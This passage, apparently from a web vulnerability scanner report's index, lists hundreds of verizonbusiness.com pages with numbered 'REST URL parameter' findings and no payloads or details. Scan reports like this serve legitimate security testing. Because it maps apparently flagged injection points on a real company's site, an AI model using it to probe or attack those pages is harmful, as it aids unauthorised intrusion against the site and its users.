1.355. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 3]

1.356. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 3]

1.357. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 1]

1.358. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 1]

1.359. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 2]

1.360. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 2]

1.361. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 3]

1.362. http://www.verizonbusiness.com/about/news/globalarchive/ [REST URL parameter 3]

1.363. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 1]

1.364. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 1]

1.365. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 2]

1.366. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 2]

1.367. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 3]

1.368. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 3]

1.369. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 1]

1.370. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 1]

1.371. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 2]

1.372. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 2]

1.373. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 3]

1.374. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 3]

1.375. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 1]

1.376. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 1]

1.377. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 2]

1.378. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 2]

1.379. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 3]

1.380. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 3]

1.381. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 1]

1.382. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 1]

1.383. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 2]

1.384. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 2]

1.385. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 3]

1.386. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 3]

1.387. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 1]

1.388. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 1]

1.389. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 2]

1.390. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 2]

1.391. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 3]

1.392. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 3]

1.393. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 1]

1.394. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 1]

1.395. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 2]

1.396. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 2]

1.397. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 3]

1.398. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 3]

1.399. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 1]

1.400. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 1]

1.401. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 2]

1.402. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 2]

1.403. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 3]

1.404. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 3]

1.405. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 1]

1.406. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 1]

1.407. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 2]

1.408. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 2]

1.409. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 3]

1.410. http://www.verizonbusiness.com/about/news/pr-25637-en-Verizon+Hosts+Nov.+9+Webinar+to+Present+Findings+of+2010+Payment+Card+Industry+Compliance+Report.xml [REST URL parameter 3]

1.411. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 1]

1.412. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 1]

1.413. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 2]

1.414. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 2]

1.415. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 3]

1.416. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 3]

1.417. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 1]

1.418. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 1]

1.419. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 2]

1.420. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 2]

1.421. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 3]

1.422. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 3]

1.423. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 1]

1.424. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 1]

1.425. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 2]

1.426. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 2]

1.427. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 3]

1.428. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 3]

1.429. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 1]

1.430. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 1]

1.431. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 2]

1.432. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 2]

1.433. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 3]

1.434. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 3]

1.435. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 1]

1.436. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 1]

1.437. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 2]

1.438. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 2]

1.439. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 3]

1.440. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 3]

1.441. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 1]

1.442. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 1]

1.443. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 2]

1.444. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 2]

1.445. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 3]

1.446. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 3]

1.447. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 1]

1.448. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 1]

1.449. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 2]

1.450. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 2]

1.451. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 3]

1.452. http://www.verizonbusiness.com/about/news/pr-25644-en-Verizon+Global+Wholesale+Wins+Best+North+American+Wholesale+Offering+Award.xml [REST URL parameter 3]

1.453. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 1]

1.454. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 1]

1.455. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 2]

1.456. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 2]

1.457. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 3]

1.458. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 3]

1.459. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 1]

1.460. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 1]

1.461. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 2]

1.462. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 2]

1.463. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 3]

1.464. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 3]

1.465. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 1]

1.466. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 1]

1.467. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 2]

1.468. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 2]

1.469. http://www.verizonbusiness.com/ar/ [REST URL parameter 1]

1.470. http://www.verizonbusiness.com/ar/ [REST URL parameter 1]

1.471. http://www.verizonbusiness.com/at/ [REST URL parameter 1]

1.472. http://www.verizonbusiness.com/at/ [REST URL parameter 1]

1.473. http://www.verizonbusiness.com/au/ [REST URL parameter 1]

1.474. http://www.verizonbusiness.com/au/ [REST URL parameter 1]

1.475. http://www.verizonbusiness.com/be/ [REST URL parameter 1]

1.476. http://www.verizonbusiness.com/be/ [REST URL parameter 1]

1.477. http://www.verizonbusiness.com/br/ [REST URL parameter 1]

1.478. http://www.verizonbusiness.com/br/ [REST URL parameter 1]

1.479. http://www.verizonbusiness.com/ca/ [REST URL parameter 1]

1.480. http://www.verizonbusiness.com/ca/ [REST URL parameter 1]

1.481. http://www.verizonbusiness.com/ch/ [REST URL parameter 1]

1.482. http://www.verizonbusiness.com/ch/ [REST URL parameter 1]

1.483. http://www.verizonbusiness.com/cl/ [REST URL parameter 1]

1.484. http://www.verizonbusiness.com/cl/ [REST URL parameter 1]

1.485. http://www.verizonbusiness.com/cn/ [REST URL parameter 1]

1.486. http://www.verizonbusiness.com/cn/ [REST URL parameter 1]

1.487. http://www.verizonbusiness.com/co/ [REST URL parameter 1]

1.488. http://www.verizonbusiness.com/co/ [REST URL parameter 1]

1.489. http://www.verizonbusiness.com/countries/ [REST URL parameter 1]

1.490. http://www.verizonbusiness.com/countries/ [REST URL parameter 1]

1.491. http://www.verizonbusiness.com/de/ [REST URL parameter 1]

1.492. http://www.verizonbusiness.com/de/ [REST URL parameter 1]

1.493. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 1]

1.494. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 1]

1.495. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 2]

1.496. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 2]

1.497. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 3]

1.498. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 3]

1.499. http://www.verizonbusiness.com/dk/ [REST URL parameter 1]

1.500. http://www.verizonbusiness.com/dk/ [REST URL parameter 1]

1.501. http://www.verizonbusiness.com/es/ [REST URL parameter 1]

1.502. http://www.verizonbusiness.com/es/ [REST URL parameter 1]

1.503. http://www.verizonbusiness.com/fi/ [REST URL parameter 1]

1.504. http://www.verizonbusiness.com/fi/ [REST URL parameter 1]

1.505. http://www.verizonbusiness.com/fr/ [REST URL parameter 1]

1.506. http://www.verizonbusiness.com/fr/ [REST URL parameter 1]

1.507. http://www.verizonbusiness.com/hk/ [REST URL parameter 1]

1.508. http://www.verizonbusiness.com/hk/ [REST URL parameter 1]

1.509. http://www.verizonbusiness.com/ie/ [REST URL parameter 1]

1.510. http://www.verizonbusiness.com/ie/ [REST URL parameter 1]

1.511. http://www.verizonbusiness.com/in/ [REST URL parameter 1]

1.512. http://www.verizonbusiness.com/in/ [REST URL parameter 1]

1.513. http://www.verizonbusiness.com/it/ [REST URL parameter 1]

1.514. http://www.verizonbusiness.com/it/ [REST URL parameter 1]

1.515. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 1]

1.516. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 1]

1.517. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 2]

1.518. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 2]

1.519. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 3]

1.520. http://www.verizonbusiness.com/it/solutions/var/ [REST URL parameter 3]

1.521. http://www.verizonbusiness.com/jp/ [REST URL parameter 1]

1.522. http://www.verizonbusiness.com/jp/ [REST URL parameter 1]

1.523. http://www.verizonbusiness.com/kr/ [REST URL parameter 1]

1.524. http://www.verizonbusiness.com/kr/ [REST URL parameter 1]

1.525. http://www.verizonbusiness.com/mx/ [REST URL parameter 1]

1.526. http://www.verizonbusiness.com/mx/ [REST URL parameter 1]

1.527. http://www.verizonbusiness.com/nl/ [REST URL parameter 1]

1.528. http://www.verizonbusiness.com/nl/ [REST URL parameter 1]

1.529. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 1]

1.530. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 1]

1.531. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 2]

1.532. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 2]

1.533. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 3]

1.534. http://www.verizonbusiness.com/nl/solutions/var/ [REST URL parameter 3]

1.535. http://www.verizonbusiness.com/no/ [REST URL parameter 1]

1.536. http://www.verizonbusiness.com/no/ [REST URL parameter 1]

1.537. http://www.verizonbusiness.com/nz/ [REST URL parameter 1]

1.538. http://www.verizonbusiness.com/nz/ [REST URL parameter 1]

1.539. http://www.verizonbusiness.com/pa/ [REST URL parameter 1]

1.540. http://www.verizonbusiness.com/pa/ [REST URL parameter 1]

1.541. http://www.verizonbusiness.com/privacy/ [REST URL parameter 1]

1.542. http://www.verizonbusiness.com/privacy/ [REST URL parameter 1]

1.543. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 1]

1.544. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 1]

1.545. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 2]

1.546. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 2]

1.547. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 3]

1.548. http://www.verizonbusiness.com/products/itsolutions/caas/ [REST URL parameter 3]

1.549. http://www.verizonbusiness.com/pt/ [REST URL parameter 1]

1.550. http://www.verizonbusiness.com/pt/ [REST URL parameter 1]

1.551. http://www.verizonbusiness.com/resources/ [REST URL parameter 1]

1.552. http://www.verizonbusiness.com/resources/ [REST URL parameter 1]

1.553. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 1]

1.554. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 1]

1.555. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 2]

1.556. http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml [REST URL parameter 2]

1.557. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 1]

1.558. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 1]

1.559. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 2]

1.560. http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml [REST URL parameter 2]

1.561. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 1]

1.562. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 1]

1.563. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 2]

1.564. http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml [REST URL parameter 2]

1.565. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 1]

1.566. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 1]

1.567. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 2]

1.568. http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml [REST URL parameter 2]

1.569. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 1]

1.570. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 1]

1.571. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 2]

1.572. http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml [REST URL parameter 2]

1.573. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 1]

1.574. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 1]

1.575. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 2]

1.576. http://www.verizonbusiness.com/resources/1002a1a7-111-Energy+and+Utilities.xml [REST URL parameter 2]

1.577. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 1]

1.578. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 1]

1.579. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 2]

1.580. http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml [REST URL parameter 2]

1.581. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 1]

1.582. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 1]

1.583. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 2]

1.584. http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml [REST URL parameter 2]

1.585. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 1]

1.586. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 1]

1.587. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 2]

1.588. http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml [REST URL parameter 2]

1.589. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 1]

1.590. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 1]

1.591. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 2]

1.592. http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml [REST URL parameter 2]

1.593. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 1]

1.594. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 1]

1.595. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 2]

1.596. http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml [REST URL parameter 2]

1.597. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 1]

1.598. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 1]

1.599. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 2]

1.600. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 2]

1.601. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 1]

1.602. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 1]

1.603. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 2]

1.604. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 2]

1.605. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 1]

1.606. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 1]

1.607. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 2]

1.608. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 2]

1.609. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 1]

1.610. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 1]

1.611. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 2]

1.612. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 2]

1.613. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 1]

1.614. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 1]

1.615. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 2]

1.616. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 2]

1.617. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 1]

1.618. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 1]

1.619. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 2]

1.620. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 2]

1.621. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 1]

1.622. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 1]

1.623. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 2]

1.624. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 2]

